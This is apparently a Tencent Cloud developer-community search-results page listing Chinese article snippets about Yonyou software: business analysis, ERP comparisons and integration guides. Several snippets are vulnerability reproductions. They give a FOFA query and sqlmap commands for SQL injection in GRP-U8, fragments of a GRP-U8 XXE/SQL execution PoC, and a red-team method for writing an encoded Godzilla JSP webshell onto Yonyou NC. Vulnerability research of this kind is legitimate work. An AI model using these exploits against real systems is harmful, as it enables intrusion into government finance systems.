- 综合排序
- 最热优先
- 最新优先
- 来自专栏Cyber Security
【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞
一、漏洞描述 用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。 ! 在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png 二、网络空间搜索引擎搜索 fofa查询语法 app="用友 -GRP-U8" 三、漏洞利用 POC:拼接/u8qx/slbmbygr.jsp? gsdm=1 访问 漏洞存在 漏洞不存在 使用SQLmap进行注入利用 sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp? gsdm=1*" 查询当前用户权限 sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*" --batch --is-dba
75310编辑于 2024-07-18 - 来自专栏安全小圈
用友GRP-U8SQL注入&远程代码执行漏洞复现
一、漏洞介绍 用友GRP-U8行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。 用友GRP-u8被曝存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有限制外部实体的加载,导致可加载恶意外部文件,可以执行SQL语句,甚至可以执行系统命令。 二、影响版本 GRP-U8 三、漏洞复现 1.环境搭建 fofa语法 title="GRP-U8" 2.漏洞复现 (1):执行SQL语句payload POST/Proxy HTTP/1.1 Host ,re.S| re.M) print(ROW[0]) if__name__=="__main__": poc(sys.argv[1]) (3):使用方法 python3GRP-U8. ,re.S| re.M) print(ROW[0]) if__name__=="__main__": poc(sys.argv[1]) (6):使用方法 python3GRP-U8.
4.4K20发布于 2021-07-08 - 来自专栏刘旷专栏
金蝶、用友,舞剑SaaS
金蝶指的就是总部定在深圳的金蝶国际,用友指的是地处北京的用友网络,从这句略带江湖气的称谓不难看出,两大巨头在业内地位之尊崇。 与金蝶不同,起步较晚的用友在云转型的过程中则显得相对平稳。用友的云转型始于2016年,从时间上看比金蝶要晚两年,但用友却保持着不疾不徐的节奏推进着,近年来用友逐渐显示出后来居上的架势。 无独有偶,用友在研发上的投入也不遑多让。公开数据显示,过去几年用友的研发费用投入多在20%以上,今年上半年的研发费用甚至达到了营收的30%。 另一方面,用友在积极巩固大客户市场的同时,也通过数智化平台用友BIP实现对中小客户市场的渗透。据悉,2021年上半年,用友网络大型企业云+软件同比增长33.8%。 从目前两家对垒的情况来看,金蝶的进攻显然更为强悍,但用友在传统大客户市场浸淫已久,金蝶在短期之内还很难超越;而在另一边,金蝶在中小企业市场的影响力,用友在短期内也同样很难撼动。
89920编辑于 2021-12-07 - 来自专栏人称T客
盘点用友网络的2015
50%,这是当时用友优普分拆出去的主要目的,可能也是看到分拆后的成效,用友今年还会继续鼓励分销彻底实现全分销的目标,从优普分拆后有人说用友NC走上渠道分销之路将不再遥远,但NC毕竟不同于U8,还是需要伙伴有很强技术团队和实施能力 所以用友在2016会越来越来强化分销的地位,直到彻底实现全分销,而NC也有可能会逐步效仿U8走向分销之路。 ,除非被用友收购或入股,用友基本上还是会以我为主。 Cloud U8和Cloud NC,但是烦恼也会随之而来,就是商业模式如何变? 用友超客并非个例,用友通信或用友的其他分子公司同样也面临着数字和转型的双重压力。
86840发布于 2018-03-21 - 来自专栏IT创事记
用友3.0战略加速推进,用友云市场地位初步确立
---- 用友3.0战略正在迸发出巨大的能量,它推动如今的用友云进入了“马太效应式”的上升空间。 用友网络近日发布2018三季度业绩报告。 平台服务布局成增长引擎 在用友3.0时期,用友形成了以用友云为核心,云服务、软件、金融服务融合发展的新战略布局,为云服务业务走上快车道铺好了道路。 8月,用友主办“2018全球企业服务大会”现场。 从产品层看,支持混合云应用模式,同时与NC/U8软件的集成应用满足了传统用户部分业务上云的需求。在这方面,统一的数字化工作台和数字企业建模服务,以及连接第三方应用与生态伙伴的努力得到了市场的认可。 此外,面向中型企业和小微企业市场,用友网络发布和更新了多款产品,包括U8+ V15.0、U8+ V15.0 PLM、畅捷通公司T﹢产品,以及NC V6.5建筑行业解决方案等。
1.2K10编辑于 2022-06-16 - 来自专栏AVAJ
用友java后端开发面经
的动态代理,cglib这个我只知道是字节码那块的,这一块底层真没怎么看,问我用到哪些类,当时只记得啥invoke,亏大啦,其实我前一天已经复习了spring的事务的,这里应该扯一扯事务的,可惜了) 8
59830发布于 2019-08-20 - 来自专栏人称T客
华为为何不选择金蝶 而是用友?
最近,关于华为ERP团访用友上周被刷屏,很多人都对此次华为的动作提出了质疑?有人质疑事件的真实性?有人质疑华为没必要替换内部的ERP系统?有人质疑为何选择的是用友?而不是金蝶? 在华为眼里更看中的是企业用户的数量,显然用友和金蝶有区别,用友存量企业用户也是华为上云的潜在客户,如果用友与华为联合共创的ERP系统,除了自用,还能帮助用友的客户加速云端转型,你认为华为会选择用友还是金蝶呢 有人说金蝶的技术架构要比用友强,金蝶比用友距离华为更近,但是在商战场上,一切以目的为导向,不是以技术和距离为导向。 用友的技术不够华为可以来补,华为这么多年对于Oracle和SAP都有相当的了解,对于用友产品和技术架构会有一定的改进作用。 第三是基于用友的企业服务生态的构建,所以用友是被华为写进战略中的合作伙伴,你认为别的厂商还有机会吗?在中国还有哪些厂商有这么多的存量客户?
12.8K31发布于 2019-06-26 - 来自专栏Lcry个人博客
Win7,Win8安装用友软件U8.72缺省MDAC组件解决方法
在windows7 X64下安装用友8.72时,都会遇到MDAC组件安装不上的情况,原因就是MDAC组件win7已经自带,但版本高于用友所能识别的版本,导致无法安装,通过网络查询及实际应用检测,成功安装用友
2.6K20编辑于 2022-11-29 - 来自专栏U8
用友U8二次开发-与第三方系统集成
近期需要对用友ERP轻量MES之间做集成,主要需要实现U8前端单据保存后将某些数量、等发送到MES上面去主要思路:前端发起一个HTTP请求、搭建中转服务,用作处理前端发过来的请求。 然后将整个处理逻辑写在中转服务器的代码上,这样可以随时方便的修改与第三方系统之间的系统集成逻辑,U8前端主要使用的是Vb语言,后端使用PythonDjango来处理后端逻辑大致流程如下:U8前端代码如下 JSON字符串反序列化为DictionaryDimresponseAsJsonResponse=JsonConvert.DeserializeObject(OfJsonResponse)(result)U8SQLHelper.U8DB.connectionString DimpostDataAsNewSystem.Text.StringBuilder()postData.Append("{""number"":2,""product"":4}")DimjsonBytesAsByte()=System.Text.Encoding.UTF8. =='POST':raw_body=request.bodyprint("原始请求体bytes:",raw_body)try:data=json.loads(raw_body.decode('utf-8'
45320编辑于 2025-11-10 - 来自专栏Nicky's blog
用友NC系列之Webservice开发入门
打开用友UAP,创建一个UAP工程 然后在public目录下面,写一个WebService接口 package nc.webservice.service; import javax.jws.WebMethod
1.4K31编辑于 2022-05-07 - 来自专栏用户8186044的专栏
用友将迎来中国的“Oracle时刻”?
用友则展现了强大的行业经验沉淀能力与AI落地实力。 更快:AI至上,用友当先 AI在企业应用的赛道上,用友走在了最前面。 用友发布最新财报显示,用友BIP产品实现AI相关合同签约金额超3.2亿元,部分单个合同金额突破千万元,远超友商金蝶半年1.5亿的签约数据。 用友的优势正在于此。 用友核心产品YonBIP与YonSuite续费率均在九成以上,这不仅让用友拥有增长的想象力,更具备了市场最为看重的确定性。 一部用友发展史,书写软件中国志。
22010编辑于 2026-03-22 - 来自专栏葡萄城控件技术团队
万物皆可集成系列:低代码释放用友U8+深度价值(3)— 数据融合应用
在之前内容中,我们介绍了如何使用低代码来扩展用友U8+系统中的数据应用,探索和实现新的业务价值。 今天我们以费用报销系统为例,向大家展示如何将新业务系统中生产的数据回写至用友U8+系统中,实现用友U8+与基于低代码开发的费用报销系统之间的双向数据传递。 26typeid%3D272 企业在建制信息系统的时候,由于需求不同、时期不同,会有很多不同的应用系统,而随着业务的发展和对数据的认识,很多业务价值需要通过系统间的数据融合才能被很好地利用起来,活字格与用友 当然,除了与用友U8+实现数据的双向融合,我们也可以在业务场景中进行尝试,挖掘探索更多低代码价值。 想要了解更多活字格对接用友U8+的案例可以参考: U8对接活字格实现报表分析案例:https://gcdn.grapecity.com.cn/showtopic-54262-1-1.html
86750编辑于 2022-09-27 - 来自专栏葡萄城控件技术团队
万物皆可集成系列:低代码释放用友U8+深度价值(2)—数据拓展应用
在上一篇内容我们介绍了如何利用低代码开发套件实现低代码应用与U8+系统的对接集成,本次给大家带来的是如何将用友U8+系统中的数据进行价值扩展和实际应用。 我们以生产物料齐套分析为例来说明如何利用低代码将U8+系统中的系统进行扩展和应用。在开始之前,先来看看什么是生产物料齐套。 在下面的分享中我们描述了如何通过U8+与活字格进行对接,将U8+系统中的生产订单数据在活字格中进行整理、统计,开发出一套齐套分析模块,帮助实现对生产订单、任务、任务明细等多个项目进行齐套管理。 如果希望将该部分应用与U8+主体服务进行集成,可以参考:万物皆可集成系列:低代码释放用友深度价值(1)—系统对接集成或查看相关公开课内容: https://gcdn.grapecity.com.cn/forum.php 想要了解更多用友U8+的案例可以参考: https://gcdn.grapecity.com.cn/showtopic-54262-1-1.html
49130编辑于 2022-09-23 - 来自专栏人称T客
CIO必读:用友U8、金蝶K3、易飞三款ERP产品优劣分析比
一、用友U8 用友U8,在用友多年财务软件的开发经验的基础上,以财务管理为企业的目标核心,以业务管理为企业的行为核心,突破了平行思考的串行的价值链结构,提出了基于立体价值链结构的产品体系部署原理 2、功能 用友ERP-U8 财务管理,包括了财务会计与管理会计的功能。能够在企业内和不同系统间,进行及时、准确、严格的财务数据传递与控制,帮助企业进行战略制定和科学决策。 小结: 用友在财务领域的开发实力是有目共睹的,在此基础上开发的U8 财务管理模块,非常实用,而且在第六届中国国际软件博览会上用友erp-u8 v8.21获得金奖。 目前很多企业原来使用的基本上就是用友财务管理软件,对这些企业来讲,U8产品能够充分利用原有系统的投资,实现系统的平滑升级,减少实施成本和风险。 1.用友ERP-U8 适应各行业的中小型企业的管理软件产品,形成了快速交付实施、低成本部署的业务模式。
4.2K40发布于 2018-03-19 - 来自专栏安全学习记录
红队技术-用友nc写shell方法
平常遇到用友nc rce可以通过exec进行命令执行,但在不出网的场景下则需要其他方法 首先生成一个哥斯拉的jsp木马,然后进行unicode编码 再把输出结果进行url编码 ! 75%30%30%32%39%5c%75%30%30%37%62%5c%75%30%30%37%64%5c%75%30%30%30%64%5c%75%30%30%30%61%25%3e", "utf-8"
45810编辑于 2022-12-26 - 来自专栏人称T客
SAP用无聊的对比暗访用友、金蝶
大家好,在这个无聊的周末居然有人反复转给我一篇文章《从中外ERP软件的差异看管理理念异同》并点名一定要让我回复,彷佛我回复了他才能够满足。说实在的,不管文章的质量如何,写文章的人还是很用心的,可以赞一个。 中国改革开放三十年以来,中国企业得到了突飞猛进的发展,这是不争的事实,企业与国际接轨的案例也越来越多,很多人也在探讨一个话题:到底是“管理出效益”,还是“关系出效益”?在不同的企业会有不同的答案… 大家又没有想过在界面、功能、和国情如此适用中国的情况下,为什么这些企业还飞蛾扑火一样的不投入你
1.8K90发布于 2018-03-16 - 来自专栏人称T客
用友、金蝶思维僵化 财税SaaS能否取而代之?
下面我们就跟随一位从用友吸取了11年经验,并且全家都在财务领域浸淫多年的创始人丁永强,来聊一聊他对自己产品---简记,以及整个国内财务SaaS市场的看法。 ? 用友、金蝶思维僵化,财税SaaS亟需变革 长期以来,用友、金蝶一直垄断财税市场,但随着云概念的兴起,SaaS模式被大众逐步接受。 用友、金蝶受制于思维僵化、自身体制等问题转型一直不太成功,这给了新进的财税SaaS公司一个不可多得的打破垄断,改造行业的机会。 丁永强说:“我在用友工作了11年,深知他们在转型时的错误和不足。 通过在用友的11年经验,又与北大、央财、上财的诸多财务泰斗们进行过多次深入交流,我对我们的产品很有信心,”丁永强说。“我们做产品前,都会画好原型图,让很多财务小白进来,给他出财务记账题。 丁永强说:“国内现在有5万8千家正规代理记账公司,他们几乎都是做低端代理记账服务的,然而用友的易代账在经营几年后,最近几乎停掉了,这说明随着财税电子化进程的加快,未来低端代理记账公司将很快消亡。”
1.8K60发布于 2018-03-23 - 来自专栏人称T客
CIO客观评价SAP和用友的差异?
“够用就好”的态度是很多人支持用友NC的理由。在项目实施过程中,客户有时候反而需要改变自己的商业运作模式以适应其软件。相比之下,用友NC无论在实施还是使用上都更加灵活。 用友承担实施和定制ERP项目,能更好的发挥ERP软件的作用 尽管SAP的支持者认为SAP ERP能帮助企业解决问题,把企业业务中的模糊需求明确化,而用友NC的支持者反而更加倾向由用友亲自来承担实施和定制 支持用友的CIO认为,由用友自行实施ERP项目,可以对项目的理解较为深入,帮助企业更深层应用到ERP的功能。而对于SAP的实施来说,选择合适的实施商可能比软件厂商更重要。 最近见到过一个IBM实施的案例,而且顾问团队有好几个所谓的“Band8”高级人员,但是最终的效果也并没达到预期。 如果公司较大,而IT人力资源又十分有限,那就完全可以外包一个用友团队来贴身服务。而SAP要一年收17%-22%的服务费用,这些钱也足够外包一个用友团队了。 ERP如何选型?
1.4K70发布于 2018-03-16 - 来自专栏深度学习与python
企业快速创新公式——用友YonBIP | Q推荐
用友商业创新平台 YouBIP 整体服务架构 用友 YonBIP 采用开放的平台与架构,整个平台中的所有模块都可以拆分,并重新组合。 在用友 YonBIP 云原生架构下,用友将企业应用服务进行了一系列的微服务解耦,每个服务都是一个域,独享数据库实例,为了不让服务之间发生资源冲突,开发了支撑多域多例的元数据驱动引擎。 目前用友 YonBIP 提供数据中台、智能中台和业务中台三种中台架构。 在安全技术方面,用友 YonBIP 本身会支持身份管理和访问控制、日志和监控、应用安全管理和资源控制等应用安全,同时用友也提供了安全开发流程来保障应用开发生命周期安全。 我们举个更通俗的例子,如果将用友 YonBIP 比作是一款乐高玩具,通过微服务,用友 YonBIP 中的每个模块都会被拆分成不同的积木碎片,通过不同企业的不同组合,甚至是同一企业的不同业务场景需求,用友
1.2K10编辑于 2023-04-01 - 来自专栏人称T客
用友战略入股销售易的机率有多大?
但是在2018年销售易放缓了融资速度,可能很多人都猜测了不同的版本,唯独没有猜到的是用友有可能会成为销售易的下一轮资本方。 用友为什么要投资销售易? 其实用友一直有一个CRM的梦想,早年就曾花费4500万元收购了Turbo CRM,但是经过用友内部的多次战略调整,Turbo CRM在用友的内部早已不见踪影。 当SaaS再次袭来的时候,资本市场开始疯狂追逐CRM厂商,也让用友倍感压力,甚至一度传出用友要与纷享销客的联姻,但是由于当时纷享销客心气正盛,被拒绝后的用友高层感到凭一已之力也可以做出中国版Salesforce ,随后用友宣布拟投资10亿用于用友超客的业务布局,而超客成立不到一年就草草收场,但这并不意味着用友要放弃这块市场。 早前,用友就对销售易开放渠道体系,这是不是进一步验证两家之间的关系已到了实质性阶段。 若能通过投资整合,用友将获得SaaS CRM产品弥补在这一领域的短板。
1.2K30发布于 2019-05-08
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号